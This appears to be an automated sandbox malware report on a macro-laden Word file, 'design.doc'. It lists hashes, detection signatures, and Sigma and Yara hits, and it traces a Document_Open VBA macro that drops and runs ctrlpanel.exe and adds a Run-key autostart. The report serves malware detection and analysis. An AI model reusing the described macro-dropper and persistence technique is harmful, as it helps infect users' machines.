Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
design.doc

Overview

General Information

Sample name:design.doc
Analysis ID:1438684
MD5:bafcfcf684bd4c363e8c1ab6e66c949c
SHA1:aa178a460745bec34cdc7a2d1d88f5f44ce60793
SHA256:5eb3b22c292fe83ee3cd938eec69c49ba59b95e6d05ce0e5bfb9b8398bc9e4c4
Tags:docUKR
Infos:

Detection

Dynamer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Dynamer
Document contains an embedded VBA macro which may execute processes
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Office process drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 6572 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • ctrlpanel.exe (PID: 7472 cmdline: c:\Users\Public\ctrlpanel.exe MD5: 40D2CCD570BD898CC31AF1CBFE5FB08E)
  • WINWORD.EXE (PID: 7576 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • rundll32.exe (PID: 7236 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\Public\ctrlpanel.exeJoeSecurity_DynamerYara detected DynamerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000005.00000000.1690796909.0000000000492000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_DynamerYara detected DynamerJoe Security
      00000005.00000002.4054412499.0000000002B11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DynamerYara detected DynamerJoe Security
        SourceRuleDescriptionAuthorStrings
        5.0.ctrlpanel.exe.490000.0.unpackJoeSecurity_DynamerYara detected DynamerJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: c:\Users\Public\ctrlpanel.exe, CommandLine: c:\Users\Public\ctrlpanel.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\ctrlpanel.exe, NewProcessName: C:\Users\Public\ctrlpanel.exe, OriginalFileName: C:\Users\Public\ctrlpanel.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 6572, ParentProcessName: WINWORD.EXE, ProcessCommandLine: c:\Users\Public\ctrlpanel.exe, ProcessId: 7472, ProcessName: ctrlpanel.exe
          Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 6572, TargetFilename: c:\Users\Public\ctrlpanel.exe
          Source: Process startedAuthor: Jason Lynch: Data: Command: c:\Users\Public\ctrlpanel.exe, CommandLine: c:\Users\Public\ctrlpanel.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\ctrlpanel.exe, NewProcessName: C:\Users\Public\ctrlpanel.exe, OriginalFileName: C:\Users\Public\ctrlpanel.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 6572, ParentProcessName: WINWORD.EXE, ProcessCommandLine: c:\Users\Public\ctrlpanel.exe, ProcessId: 7472, ProcessName: ctrlpanel.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: c:\Users\Public\ctrlpanel.exe, CommandLine: c:\Users\Public\ctrlpanel.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\ctrlpanel.exe, NewProcessName: C:\Users\Public\ctrlpanel.exe, OriginalFileName: C:\Users\Public\ctrlpanel.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 6572, ParentProcessName: WINWORD.EXE, ProcessCommandLine: c:\Users\Public\ctrlpanel.exe, ProcessId: 7472, ProcessName: ctrlpanel.exe
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\Users\Public, EventID: 13, EventType: SetValue, Image: C:\Users\Public\ctrlpanel.exe, ProcessId: 7472, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ctrlpanel
          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 6572, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: design.docAvira: detected
          Source: C:\Users\Public\ctrlpanel.exeReversingLabs: Detection: 65%
          Source: design.docReversingLabs: Detection: 73%
          Source: C:\Users\Public\ctrlpanel.exeJoe Sandbox ML: detected
          Source: design.docJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
          Source: Binary string: E:\Projects\OfflRouter2\OfflRouter2\obj\Release\ctrlpanel.pdb source: ctrlpanel.exe, 00000005.00000000.1690796909.0000000000492000.00000002.00000001.01000000.00000006.sdmp, ctrlpanel.exe.0.dr

          Software Vulnerabilities

          barindex
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: c:\Users\Public\ctrlpanel.exeJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: ctrlpanel.exe.0.drJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Users\Public\ctrlpanel.exe
          Source: winword.exeMemory has grown: Private usage: 1MB later: 85MB
          Source: ctrlpanel.exe, 00000005.00000002.4062919397.000000001B7D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 5.0.ctrlpanel.exe.490000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.1690796909.0000000000492000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4054412499.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Users\Public\ctrlpanel.exe, type: DROPPED

          System Summary

          barindex
          Source: design.docOLE, VBA macro line: Call Shell(ShS)
          Source: ~DF854321D7021239C2.TMP.0.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: design.doc.5.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: design.doc0.5.drOLE, VBA macro line: Call Shell(ShS)
          Source: design.doc0.5.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD3881.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD3881.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD0199.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD0820.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD0820.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD1058.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD1250.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD1250.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD1453.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD1446.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD1652.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD1652.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD1575.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD1575.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD1820.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD1973.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD1992.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD1992.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD2106.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD2106.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD2175.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD2539.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD2371.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD2371.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD2657.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD2657.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD2566.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD2926.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD2746.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD2746.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD3047.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD3047.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD3274.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD2945.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD3403.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD3403.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD3148.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD3148.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD0447.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD3320.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD0568.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD0568.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD3480.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD3480.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD0721.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD3672.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD0846.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD0846.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD3840.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD3840.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD0000.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD0002.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD0002.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD0971.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD3976.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: ~WRD1178.tmp.6.drOLE, VBA macro line: Call Shell(ShS)
          Source: ~WRD1178.tmp.6.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\Public\ctrlpanel.exeJump to dropped file
          Source: design.docOLE, VBA macro line: Private Sub Document_Open()
          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
          Source: ~DF854321D7021239C2.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
          Source: design.doc.5.drOLE, VBA macro line: Private Sub Document_Open()
          Source: design.doc0.5.drOLE, VBA macro line: Private Sub Document_Open()
          Source: design.doc0.5.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3881.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3881.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD0199.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD0820.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD0820.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1058.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1250.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1250.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1453.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1446.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1652.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1652.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1575.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1575.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1820.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1973.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1992.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1992.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD2106.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD2106.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD2175.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD2539.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD2371.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD2371.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD2657.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD2657.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD2566.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD2926.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD2746.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD2746.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3047.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3047.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3274.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD2945.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3403.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3403.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3148.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3148.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD0447.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3320.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD0568.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD0568.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3480.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3480.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD0721.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3672.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD0846.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD0846.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3840.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3840.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD0000.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD0002.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD0002.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD0971.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD3976.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1178.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: ~WRD1178.tmp.6.drOLE, VBA macro line: Private Sub Document_Open()
          Source: design.docOLE indicator, VBA macros: true
          Source: sist02.xsl.0.drOLE indicator, VBA macros: true
          Source: ieee2006officeonline.xsl.0.drOLE indicator, VBA macros: true
          Source: chicago.xsl.0.drOLE indicator, VBA macros: true
          Source: mlaseventheditionofficeonline.xsl.0.drOLE indicator, VBA macros: true
          Source: turabian.xsl.0.drOLE indicator, VBA macros: true
          Source: gostname.xsl.0.drOLE indicator, VBA macros: true
          Source: ~DF854321D7021239C2.TMP.0.drOLE indicator, VBA macros: true
          Source: harvardanglia2008officeonline.xsl.0.drOLE indicator, VBA macros: true
          Source: gb.xsl.0.drOLE indicator, VBA macros: true
          Source: APASixthEditionOfficeOnline.xsl.0.drOLE indicator, VBA macros: true
          Source: iso690.xsl.0.drOLE indicator, VBA macros: true
          Source: iso690nmerical.xsl.0.drOLE indicator, VBA macros: true
          Source: gosttitle.xsl.0.drOLE indicator, VBA macros: true
          Source: design.doc.5.drOLE indicator, VBA macros: true
          Source: design.doc0.5.drOLE indicator, VBA macros: true
          Source: ~WRD3881.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD0199.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD0820.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD1058.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD1250.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD1453.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD1446.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD1652.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD1575.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD1820.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD1973.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD1992.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD2106.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD2175.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD2539.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD2371.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD2657.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD2566.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD2926.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD2746.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD3047.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD3274.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD2945.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD3403.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD3148.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD0447.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD3320.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD0568.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD3480.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD0721.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD3672.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD0846.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD3840.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD0000.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD0002.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD0971.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD3976.tmp.6.drOLE indicator, VBA macros: true
          Source: ~WRD1178.tmp.6.drOLE indicator, VBA macros: true
          Source: design.docOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{F7D8C42A-9F3D-4573-AA39-48312C55A8FA}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: sist02.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ieee2006officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: chicago.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: mlaseventheditionofficeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: turabian.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: gostname.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~DF854321D7021239C2.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: harvardanglia2008officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: gb.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: APASixthEditionOfficeOnline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: iso690.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: iso690nmerical.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: gosttitle.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: design.doc.5.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{2BC6352A-126C-45AF-B021-3D7031DA06DE}.tmp.6.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\Public\ctrlpanel.exe 10E720FBCF797A2F40FBAA214B3402DF14B7637404E5E91D7651BD13D28A69D8
          Source: classification engineClassification label: mal100.troj.expl.winDOC@7/504@0/0
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\OfficeJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeMutant created: NULL
          Source: C:\Users\Public\ctrlpanel.exeMutant created: \Sessions\1\BaseNamedObjects\ctrlpanelapppppp
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{5CF0A579-15DC-44FF-BEC7-DDDB640B5514} - OProcSessId.datJump to behavior
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drOLE indicator, Word Document stream: true
          Source: Equations.dotx.0.drOLE indicator, Word Document stream: true
          Source: Insight design set.dotx.0.drOLE indicator, Word Document stream: true
          Source: Element design set.dotx.0.drOLE indicator, Word Document stream: true
          Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
          Source: design.doc0.5.drOLE indicator, Word Document stream: true
          Source: ~WRD3881.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD0199.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD0820.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD1058.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD1250.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD1453.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD1446.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD1652.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD1575.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD1820.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD1973.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD1992.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD2106.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD2175.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD2539.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD2371.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD2657.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD2566.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD2926.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD2746.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD3047.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD3274.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD2945.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD3403.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD3148.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD0447.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD3320.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD0568.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD3480.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD0721.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD3672.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD0846.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD3840.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD0000.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD0002.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD0971.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD3976.tmp.6.drOLE indicator, Word Document stream: true
          Source: ~WRD1178.tmp.6.drOLE indicator, Word Document stream: true
          Source: design.docOLE document summary: title field not present or empty
          Source: ~WRF{F7D8C42A-9F3D-4573-AA39-48312C55A8FA}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{F7D8C42A-9F3D-4573-AA39-48312C55A8FA}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{F7D8C42A-9F3D-4573-AA39-48312C55A8FA}.tmp.0.drOLE document summary: edited time not present or 0
          Source: ~DF854321D7021239C2.TMP.0.drOLE document summary: title field not present or empty
          Source: ~DF854321D7021239C2.TMP.0.drOLE document summary: author field not present or empty
          Source: ~DF854321D7021239C2.TMP.0.drOLE document summary: edited time not present or 0
          Source: design.doc.5.drOLE document summary: title field not present or empty
          Source: design.doc0.5.drOLE document summary: title field not present or empty
          Source: design.doc0.5.drOLE document summary: edited time not present or 0
